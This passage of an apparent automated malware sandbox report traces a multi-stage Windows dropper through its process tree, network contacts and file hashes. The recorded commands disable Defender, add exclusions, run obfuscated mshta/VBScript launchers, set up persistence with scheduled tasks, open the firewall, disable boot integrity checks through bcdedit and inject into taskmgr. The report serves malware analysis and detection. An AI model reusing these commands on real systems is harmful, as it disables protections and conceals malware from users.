a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Program Files (x86)\Gparted\Build.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe
"C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue121e696b2d94fe.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue120ba2d3df.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue12b645e6648.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue127d1be88dd70f8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue12b505de68357.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue12536443c2c8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1239d4b60d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1264f7b252.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue129ba086d712.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue125fd9410f80dd6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue127ff3b5477.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue123e8bf9beda40e5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue12d6c3a590f5c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue122eaa5d903b51f3.exe /mixtwo
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue12f72da5484b.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127d1be88dd70f8.exe
Tue127d1be88dd70f8.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe
Tue121e696b2d94fe.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe
Tue1239d4b60d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127ff3b5477.exe
Tue127ff3b5477.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe
Tue129ba086d712.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe
Tue12d6c3a590f5c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b505de68357.exe
Tue12b505de68357.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe
Tue12b645e6648.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe
Tue12f72da5484b.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe
Tue1264f7b252.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe
Tue120ba2d3df.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe
Tue125fd9410f80dd6.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe" -u
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe
Tue12536443c2c8.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe
Tue122eaa5d903b51f3.exe /mixtwo
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe
Tue123e8bf9beda40e5.exe
C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp" /SL5="$70192,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRIPT: CLoSe ( CreAtEoBject ("WSCrIPT.sheLL" ). RUn( "cmD.ExE /q /r TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe"" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If """" == """" for %h IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe"" ) do taskkill /F -Im ""%~Nxh"" ", 0, trUe ) )
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp" /SL5="$6015E,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe"
C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp" /SL5="$70160,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe" /SILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 448 -s 272
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /r TYPe "C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If "" == "" for %h IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe" ) do taskkill /F -Im "%~Nxh"
C:\Users\Admin\AppData\Local\Temp\YFBh.exE
YFBH.EXe -pM6ql1llc4LCunhpM
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Tue120ba2d3df.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRIPT: CLoSe ( CreAtEoBject ("WSCrIPT.sheLL" ). RUn( "cmD.ExE /q /r TYPe ""C:\Users\Admin\AppData\Local\Temp\YFBh.exE"" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If ""-pM6ql1llc4LCunhpM "" == """" for %h IN ( ""C:\Users\Admin\AppData\Local\Temp\YFBh.exE"" ) do taskkill /F -Im ""%~Nxh"" ", 0, trUe ) )
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /r TYPe "C:\Users\Admin\AppData\Local\Temp\YFBh.exE" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If "-pM6ql1llc4LCunhpM " == "" for %h IN ( "C:\Users\Admin\AppData\Local\Temp\YFBh.exE" ) do taskkill /F -Im "%~Nxh"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241109212805.log C:\Windows\Logs\CBS\CbsPersist_20241109212805.cab
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCrIpT:clOSe( CreATEObjeCt( "WsCriPT.sheLL" ). ruN ( "Cmd.exe /q /c Echo | SeT /P = ""MZ"" > ylDS9MD.oZ & CoPy /B /Y YlDS9MD.OZ + 7YBr4YIV.4 + L8jNB.A + Kkyl.Ybx + YHDI9E.EIU + KsN5NH.WJU NKGtN.2& STaRt control .\NKGTN.2 ", 0 , trUe ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c Echo | SeT /P = "MZ" > ylDS9MD.oZ& CoPy /B /Y YlDS9MD.OZ+7YBr4YIV.4 + L8jNB.A+ Kkyl.Ybx + YHDI9E.EIU + KsN5NH.WJU NKGtN.2& STaRt control .\NKGTN.2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>ylDS9MD.oZ"
C:\Windows\SysWOW64\control.exe
control .\NKGTN.2
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\NKGTN.2
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Program Files (x86)\Gparted\Build.sfx.exe
"C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1
C:\Program Files (x86)\Gparted\Build.exe
"C:\Program Files (x86)\Gparted\Build.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
C:\Program Files (x86)\Gparted\gimagex.exe
"C:\Program Files (x86)\Gparted\gimagex.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "93478235813389613141469676073-1481490987-849097770-411083071-256084815-1993590202"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /306-306
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-130913910907659240-117405465-1152408639-1249432833413201776-3437839801289592925"
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-3089677442696828811337722847-2117008512-245034745-14781113735556310801475178297"
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\NKGTN.2
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\NKGTN.2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 1668
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
| Country | Destination | Domain | Proto |
| FR | 212.193.30.45:80 | tcp | |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | 56.jpgamehome.com | udp |
| US | 8.8.8.8:53 | tweakballs.com | udp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | webdatingcompany.me | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | buy-fantasy-gxmes.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FR | 91.121.67.60:51630 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| DE | 49.12.219.50:4846 | tcp | |
| NL | 185.154.15.4:21735 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| FR | 212.193.30.29:80 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| DE | 49.12.219.50:4846 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| FR | 91.121.67.60:51630 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| US | 8.8.8.8:53 | www.yahoo.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| DE | 212.192.241.62:80 | tcp | |
| NL | 185.154.15.4:21735 | tcp | |
| US | 8.8.8.8:53 | trumops.com | udp |
| US | 8.8.8.8:53 | www.yahoo.com | udp |
| US | 8.8.8.8:53 | retoti.com | udp |
| US | 8.8.8.8:53 | logs.trumops.com | udp |
| US | 8.8.8.8:53 | logs.retoti.com | udp |
| DE | 49.12.219.50:4846 | tcp | |
| US | 8.8.8.8:53 | bfdeedc9-3ac6-448e-a6f3-60a0bcb893c2.uuid.trumops.com | udp |
| US | 8.8.8.8:53 | server10.trumops.com | udp |
| US | 44.221.84.105:443 | server10.trumops.com | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| DE | 49.12.219.50:4846 | tcp | |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| DE | 49.12.219.50:4846 | tcp | |
| FR | 91.121.67.60:51630 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| NL | 185.154.15.4:21735 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| FR | 91.121.67.60:51630 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| NL | 185.154.15.4:21735 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| FR | 91.121.67.60:51630 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| NL | 185.154.15.4:21735 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| US | 8.8.8.8:53 | dumancue.com | udp |
| FR | 91.121.67.60:51630 | tcp | |
| DE | 49.12.219.50:4846 | tcp | |
| DE | 49.12.219.50:4846 | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
| MD5 | 653f5bbaac95d546bb4c5c7557b25c22 |
| SHA1 | 346e064735ca5abe0963288dd342d7ea058bb61a |
| SHA256 | d427e3e6fb34458f934fbe1f61ee8a480f84d2d20bf3fcc436e772593d2d5f12 |
| SHA512 | 1feeab3ade970823abba275110655beac744eb34e59a47c7058bccde0beb699999f627e7b1abbee1f76db6a3e4780781fe3b88c7c798a5639d6b458d35f6a446 |
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zSC5B35246\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2692-61-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC5B35246\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2692-58-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC5B35246\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
\Users\Admin\AppData\Local\Temp\7zSC5B35246\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/2692-80-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2692-79-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2692-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2692-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2692-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2692-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2692-75-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2692-74-0x000000006494A000-0x000000006494F000-memory.dmp
memory/2692-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2692-71-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2692-70-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2692-69-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe
| MD5 | 4f11e641d16d9590ac1c9f70d215050a |
| SHA1 | 75688f56c970cd55876f445c8319d7b91ce556fb |
| SHA256 | efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0 |
| SHA512 | b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007 |
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe
| MD5 | 7b253e0725b69672ef3d44d524de2c4c |
| SHA1 | f3c0d9f5f984ee5d7578eeabded495094cec1031 |
